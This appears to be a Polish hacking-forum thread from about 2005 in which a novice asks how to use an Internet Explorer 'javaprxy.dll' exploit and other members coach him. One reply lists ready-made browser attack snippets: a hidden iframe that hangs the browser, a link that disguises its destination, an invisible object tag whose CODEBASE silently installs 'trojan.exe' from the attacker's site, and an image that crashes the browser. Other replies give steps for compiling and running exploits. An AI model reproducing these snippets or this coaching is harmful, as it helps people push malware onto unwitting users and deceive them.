Microsoft Internet Explorer "javaprxy.dll" Command

cool666

Użytkownik
Dołączył
Grudzień 27, 2004
Posty
24
No a wiec znalazłem exploita: http://www.frsirt.com/exploits/20050702.ie...yexploit.pl.php i niezabardzo wiem co z tym dalej zrobić?
Może ktoś wie? Tylko prosze o dokładny opis bo jestem "zielony" w tej dziedzinie
smile.gif
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Re: Microsoft Internet Explorer "javaprxy.dll" Com

Originally posted by cool666
No a wiec znalazłem exploita: http://www.frsirt.com/exploits/20050702.ie...yexploit.pl.php i niezabardzo wiem co z tym dalej zrobić?
Może ktoś wie? Tylko prosze o dokładny opis bo jestem "zielony" w tej dziedzinie
smile.gif
Chcesz exploitow IE ?? :lo: Masz
<
:

1.
http://www.haxite.org/index.php3?site=arty...view&id=292 // vol1

2.
http://www.haxite.org/index.php3?site=arty...view&id=293 // vol2

3.
http://www.haxite.org/index.php3?site=arty...view&id=298 // vol3

4.Zwiecha IE.
Kod:
<html>

<iframe src="???" width="1%" height="1%"></iframe>

</html>
5. 2. URL <-- jak najezdzasz na link pokazuje sie google.pl, jak klikniesz przeniesie cie na o2.pl

Kod:
<html>

[url="http://google.pl><table><tr><td>  <a href="]Kliknij tutaj</td></tr></table>[/url]

</html>

6. Instalacja trojanka/wiruska
<
.
Kod:
<object width=0 height=0 CODEBASE="http://adres.twojej.strony/trojan.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

7. Przegladarka sie kaszani =].

Kod:
<HTML>

 <BODY>

    [img]./imagecrash.jpg[/img]

 </BODY>

</HTML>

8. Linki do innych bugow w IE:

http://www.cc-team.org/index.php?name=bugtraq&show=96
http://www.cc-team.org/index.php?name=bugtraq&show=4
http://www.cc-team.org/index.php?name=bugtraq&show=111
http://www.cc-team.org/index.php?name=bugtraq&show=153
http://www.cc-team.org/index.php?name=bugtraq&show=180
http://www.cc-team.org/index.php?name=bugtraq&show=216
http://www.cc-team.org/index.php?name=bugtraq&show=270
http://www.cc-team.org/index.php?name=bugtraq&show=276
http://www.cc-team.org/index.php?name=bugtraq&show=284
http://www.cc-team.org/index.php?name=bugtraq&show=341
http://www.cc-team.org/index.php?name=bugtraq&show=650
http://www.cc-team.org/index.php?name=bugtraq&show=802
http://www.cc-team.org/index.php?name=bugtraq&show=803
http://hacking.pl/5175
http://hacking.pl/5125

I jest tego duzo, duzo wiecej
<
.
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by esdedwa
IE kopalnią bugów
smile.gif


<div class='quotetop'>CYTAT
No a wiec znalazłem exploita: http://www.frsirt.com/exploits/20050702.ie...yexploit.pl.php i niezabardzo wiem co z tym dalej zrobić?
Może ktoś wie? Tylko prosze o dokładny opis bo jestem "zielony" w tej dziedzinie Uśmiech...

Musisz to skompilować w jakims kompilatorze c ;][/b][/quote]
:x no comments
<
!!
to jest napisane w perlu
<
:mrgreen:
<
=]
Kod:
chmod +x exploit.pl

./exploit.pl
najpierw nadajesz prawa plikowi (pierwsza linijka), a potem go odpalasz(druga linijka
<
)
<
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by esdedwa
ogolnie na temat kompilacji exploitow (np. mając blablabla.c zrobic blablabla.exe)
<
<
<
exploit.c
gcc -o exploicik exploit.c // exploicik to nazwa skompilowanego pliku
./exploicik // tak odpalamy nasz skompilowany exploit

exploit.cpp
g++ -o exploicik exploit.cpp // exploicik to nazwa skompilowanego pliku
./exploicik // tak odpalamy nasz skompilowany exploit

exploit.pl
chmod +x exploit.pl // nadajemy prawa plikowi
./exploit.pl // odpalamy exploita

exploit.sh
chmod +x exploit.sh // nadajemy prawa plikowi
./exploit.sh // odpalamy exploita
 

{genie}

Użytkownik
Dołączył
Lipiec 18, 2005
Posty
21
Pod winda skrypty w perlu bez zgrzytow mozna ewentualnie odpalic jak ma sie cygwina zainstalowanego (mialem, uzywalem, calkiem przyjemny :) )

Pozdrawiam
 

esdedwa

Użytkownik
Dołączył
Lipiec 2, 2004
Posty
78
wlasnie probuje przez cygwina to zrobic i pisze

Kod:
gcc -o blablabla blablabla.c
i [Enter]
<

i mi wyskakuje
Kod:
gcc: blablabla.c: No such file or directory

gcc: no input files

W takim razie skoro nie widzi blablabla.c to gdzie mam go rzucić bo jest w bin i niewidzi :evil:
 

NiuNio

Użytkownik
Dołączył
Listopad 18, 2002
Posty
953
zrob katalog X i wrzuc go tam pozniej wejdz do katalogu X i tam go skompiluj bo wydaje mi sie ze nie wszedles do /bin :]
 

Eltrial

Użytkownik
Dołączył
Kwiecień 27, 2004
Posty
325
ehhh...wlamywac sie do komputerow by chcieli, exploity kompilowac a odroznic perla od C niemoga :)
na poczatku pliku jak jest
#!/usr/bin/perl to znaczy ze to jest w perlu.
 

cool666

Użytkownik
Dołączył
Grudzień 27, 2004
Posty
24
No a wiec sciągnołem Cygwina i niewiem co dalej
<
może mi ktoś w jakiś prosty sposob objaśnic co zrobić z tym exploicikiem?
 
Do góry Bottom